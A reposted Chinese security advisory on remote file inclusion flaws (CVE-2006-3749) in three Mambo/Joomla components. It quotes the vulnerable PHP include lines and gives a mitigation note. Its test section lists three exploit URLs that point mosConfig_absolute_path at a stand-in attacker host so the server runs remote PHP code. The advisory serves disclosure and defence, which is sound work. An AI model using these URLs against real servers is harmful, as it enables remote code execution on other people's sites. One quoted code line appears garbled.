Mambo/Joomla多个组件远程文件包含漏洞

2008-04-09 04:19:00来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Mambo/Joomla多个组件远程文件包含漏洞

发布日期:2006-07-12
更新日期:2006-07-14

受影响系统:
Mambo com_hashcash 1.2.1
Mambo ImageManager 1.5
Mambo Sitemap 2.0.0
描述:
BUGTRAQ ID: 18991
CVE(CAN) ID: CVE-2006-3749

Mambo(也被称为Joomla)是一款开放源代码的WEB内容管理系统。

Mambo的多个组件中存在远程文件包含漏洞,远程攻击者可能利用这些漏洞在服务器上以Web进程权限执行任意命令。

由于没有正确过滤$mosConfig_absolute_path变量,因此在register_globals=on和allow_fopenurl=on的配置情况下攻击者就可以使脚本包含远程服务器上的PHP代码执行。

漏洞相关的脚本及代码如下:

# Hashcash组件

在com_hashcash文件夹中server.php脚本存在漏洞:

-----------------------server.php---------------------------------------
<?php
include($."/administrator/components/com_hashcash/config.hashcash.php");
require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php');
...................

------------------------------------------------------------------------

# HTMLArea3 addon - ImageManager

在ImageManager文件夹中config.inc.php脚本存在漏洞:

-----------------------config.inc.php-----------------------------------
<?php
// $Id: config.inc.php, v 1.5 2004/06/03 17:35:27 bpfeifer Exp $
/**
* HTMLArea3 addon - ImageManager
* Based on Wei Zhuo's ImageManager
* @package Mambo Open Source
* @Copyright 2004 Bernhard Pfeifer aka novocaine
* @ All rights reserved
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version $Revision: 1.5 $
**/

require($mosConfig_absolute_path."/administrator/components/com_htmlarea3_xtd-c/config.htmlarea3_xtd-c.php");

------------------------------------------------------------------------

# Sitemap 2.0.0 for Mambo 4.5.1 CMS

在com_sitemap文件夹中sitemap.xml.php脚本存在漏洞:

-----------------------sitemap.xml.php----------------------
<?php

/**
* XML/XHTML menu system
* @package Mambo_4.5.1
* @copyright (C) 2000 - 2004 Miro International Pty Ltd
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* Mambo is Free Software
* Author : Johan Janssens - johan@jinx.be (http://www.jinx.be)
**/

// XML library
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );

------------------------------------------------------------



<*来源:Ahmad Maulana (matdhule@gmail.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115280523322971&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[target]/[path]/components/com_hashcash/server.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript
http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt?

建议:
临时解决方法:

* 过滤$mosConfig_absolute_path变量。

厂商补丁:

Mambo
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sourceforge.net/projects/mambo

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft IE ActiveX对象Transition属性拒绝服务漏洞

下一篇:Forum 5 pm.php本地文件包含漏洞